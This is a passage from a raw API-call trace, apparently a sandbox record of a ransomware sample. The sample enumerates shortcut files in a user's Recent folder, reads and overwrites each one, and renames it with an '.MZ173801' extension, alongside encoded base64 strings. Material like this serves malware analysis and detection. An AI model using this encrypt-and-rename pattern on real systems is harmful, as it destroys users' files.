lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.923] GetCurrentThreadId () returned 0x1358 [0106.923] GetCurrentThreadId () returned 0x1358 [0106.923] GetCurrentThreadId () returned 0x1358 [0106.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.924] GetCurrentThreadId () returned 0x1358 [0106.924] GetCurrentThreadId () returned 0x1358 [0106.924] GetCurrentThreadId () returned 0x1358 [0106.924] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\93FAioEJ-r.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\93faioej-r.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.925] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.925] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.925] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x288 [0106.925] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.925] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x288, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x288, lpOverlapped=0x0) returned 1 [0106.926] CloseHandle (hObject=0x3f4) returned 1 [0106.926] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\93FAioEJ-r.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\93faioej-r.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.927] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x288, lpOverlapped=0x0) returned 1 [0106.928] CloseHandle (hObject=0x3f4) returned 1 [0106.928] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\93FAioEJ-r.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\93faioej-r.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\93FAioEJ-r.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\93faioej-r.lnk.mz173801")) returned 1 [0106.929] GetCurrentThreadId () returned 0x1358 [0106.929] GetCurrentThreadId () returned 0x1358 [0106.929] GetCurrentThreadId () returned 0x1358 [0106.929] GetCurrentThreadId () returned 0x1358 [0106.929] GetCurrentThreadId () returned 0x1358 [0106.929] GetCurrentThreadId () returned 0x1358 [0106.929] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb488443, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb488443, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb488443, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3ee, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="a TQSWLwdnXwLBG6xlM.lnk", cAlternateFileName="ATQSWL~1.LNK")) returned 1 [0106.929] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.929] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.929] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a TQSWLwdnXwLBG6xlM.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\a tqswlwdnxwlbg6xlm.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb488443, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb488443, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb488443, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3ee)) returned 1 [0106.929] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.929] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.930] GetCurrentThreadId () returned 0x1358 [0106.930] GetCurrentThreadId () returned 0x1358 [0106.930] GetCurrentThreadId () returned 0x1358 [0106.930] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.930] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.931] GetCurrentThreadId () returned 0x1358 [0106.931] GetCurrentThreadId () returned 0x1358 [0106.931] GetCurrentThreadId () returned 0x1358 [0106.931] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a TQSWLwdnXwLBG6xlM.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\a tqswlwdnxwlbg6xlm.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.931] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.931] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.931] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3ee [0106.931] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.931] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3ee, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x3ee, lpOverlapped=0x0) returned 1 [0107.101] CloseHandle (hObject=0x3f4) returned 1 [0107.102] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a TQSWLwdnXwLBG6xlM.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\a tqswlwdnxwlbg6xlm.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.103] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x3ee, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x3ee, lpOverlapped=0x0) returned 1 [0107.103] CloseHandle (hObject=0x3f4) returned 1 [0107.104] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a TQSWLwdnXwLBG6xlM.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\a tqswlwdnxwlbg6xlm.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a TQSWLwdnXwLBG6xlM.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\a tqswlwdnxwlbg6xlm.lnk.mz173801")) returned 1 [0107.105] GetCurrentThreadId () returned 0x1358 [0107.105] GetCurrentThreadId () returned 0x1358 [0107.105] GetCurrentThreadId () returned 0x1358 [0107.105] GetCurrentThreadId () returned 0x1358 [0107.105] GetCurrentThreadId () returned 0x1358 [0107.105] GetCurrentThreadId () returned 0x1358 [0107.105] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea316981, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea316981, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea316981, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x54c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="AGpwWiEbNPs_OK mC0E.lnk", cAlternateFileName="AGPWWI~1.LNK")) returned 1 [0107.105] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.105] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.105] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AGpwWiEbNPs_OK mC0E.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\agpwwiebnps_ok mc0e.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea316981, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea316981, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea316981, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x54c)) returned 1 [0107.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 